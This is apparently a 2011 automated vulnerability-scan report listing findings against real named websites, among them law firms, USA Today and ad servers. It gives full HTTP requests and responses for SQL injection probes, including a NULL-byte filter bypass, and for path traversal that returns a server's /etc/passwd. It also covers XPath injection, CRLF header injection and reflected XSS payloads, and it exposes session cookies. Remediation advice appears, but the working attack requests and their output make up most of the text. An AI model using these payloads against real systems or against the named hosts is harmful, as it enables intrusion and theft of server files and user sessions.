Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8

Response 2

HTTP/1.1 301 Moved Permanently
Date: Thu, 12 May 2011 18:36:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Set-Cookie: sl_session=2d642a2ebf431247abb7d7a4aa556bba; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 0


1.105. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm [NewsID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The NewsID parameter appears to be vulnerable to SQL injection attacks. The payloads 46402591%20or%201%3d1--%20 and 46402591%20or%201%3d2--%20 were each submitted in the NewsID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=383746402591%20or%201%3d1--%20 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A24%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:24 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<b>beats chasing a burning dog</b></td>
...[SNIP]...

Request 2

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=383746402591%20or%201%3d2--%20 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A24%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:24 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<b></b></td>
...[SNIP]...

1.106. http://www.wiggin.com/showarea.aspx [Show parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wiggin.com
Path:   /showarea.aspx

Issue detail

The Show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the Show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /showarea.aspx?Show=10669%00' HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/areas.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.2.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4564

<html>
<head>
<title>Unclosed quotation mark before the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black
...[SNIP]...

2. File path traversal

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hartfordbusiness.com
Path:   /fs_webkit/fs_css_processor.php

Issue detail

The src parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /template/hbj/forms.fcss../../../../../../../../etc/passwd was submitted in the src parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

Request

GET /fs_webkit/fs_css_processor.php?src=/template/hbj/forms.fcss../../../../../../../../etc/passwd&color=primary!891709*sidebar!EEE1CE*link!0000FF*link_hover!ff0000 HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 6122

/* WARNING: I COULDN'T WRITE THIS FILE, THE DIRECTORY IS WRITE PROTECTED */
/* TRIED TO WRITE FILE : /app/production/nebm/universal/template/hbj/forms.css../../../../../../../../etc/passwd*/
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
haldaemon:x:103:108:Hardwa
...[SNIP]...

3. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.usatoday.com
Path:   /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm' HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Thu, 12 May 2011 16:59:28 GMT
Connection: close
Content-Length: 2866

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

4. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3ca7a%0d%0a43c5b8cf812 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3ca7a%0d%0a43c5b8cf812/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.16.57.32 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3ca7a
43c5b8cf812
/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.16.57.32:
Date: Thu, 12 May 2011 19:54:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 58306%0d%0a81ee06eb858 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /58306%0d%0a81ee06eb858/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/58306
81ee06eb858
/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3;sz=300x250;ord=[timestamp]:
Date: Fri, 13 May 2011 00:43:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5. Cross-site scripting (reflected)
There are 109 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ds.addthis.com/red/psi/sites/www.dmoc.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.dmoc.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 216f1<script>alert(1)</script>03ce066cb79 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.dmoc.com/p.json?callback=_ate.ad.hpr216f1<script>alert(1)</script>03ce066cb79&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.dmoc.com%2Fpractice&ref=http%3A%2F%2Fwww.dmoc.com%2F&1gd1nk7 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219565.1EY; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 18:08:46 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 18:08:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 18:08:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 18:08:46 GMT
Connection: close

_ate.ad.hpr216f1<script>alert(1)</script>03ce066cb79({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.2. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c169a<script>alert(1)</script>da128c23be7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hprc169a<script>alert(1)</script>da128c23be7&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fstaff&ref=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&1309hcm HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:35:18 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:35:18 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:35:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:35:18 GMT
Connection: close

_ate.ad.hprc169a<script>alert(1)</script>da128c23be7({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.3. http://ds.addthis.com/red/psi/sites/www.letipli.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.letipli.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f28a5<script>alert(1)</script>3d1c81797c5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.letipli.com/p.json?callback=_ate.ad.hprf28a5<script>alert(1)</script>3d1c81797c5&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.letipli.com%2Fmember_details.asp8e4b7--%253E%253Cscript%253Ealert(%2522GHDB%2522)%253C%2Fscript%253E76ff3e246a7&ref=http%3A%2F%2Fburp%2Fshow%2F16&1jbi7oi HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219565.1EY; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 13 May 2011 00:42:40 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 12 Jun 2011 00:42:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 13 May 2011 00:42:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 13 May 2011 00:42:40 GMT
Connection: close

_ate.ad.hprf28a5<script>alert(1)</script>3d1c81797c5({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.4. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e894a<script>alert(1)</script>28b51df7b70 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpre894a<script>alert(1)</script>28b51df7b70&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcases.html%3Faction%3DcaseDetail%26CaseID%3D102&g0rr6z HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 255
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 17:03:38 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 17:03:38 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219818.1EY; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:59:25 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 17:03:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 17:03:38 GMT
Connection: close

_ate.ad.hpre894a<script>alert(1)</script>28b51df7b70({"urls":["http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/39CD8FF4-531A-4266-A340-45548C451F45/User/4dc048d9159e4ae3/gif"],"segments" : ["1EY"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="
...[SNIP]...

5.5. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.tydingslaw.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload af6a5<script>alert(1)</script>b51a3380c9e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpraf6a5<script>alert(1)</script>b51a3380c9e&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
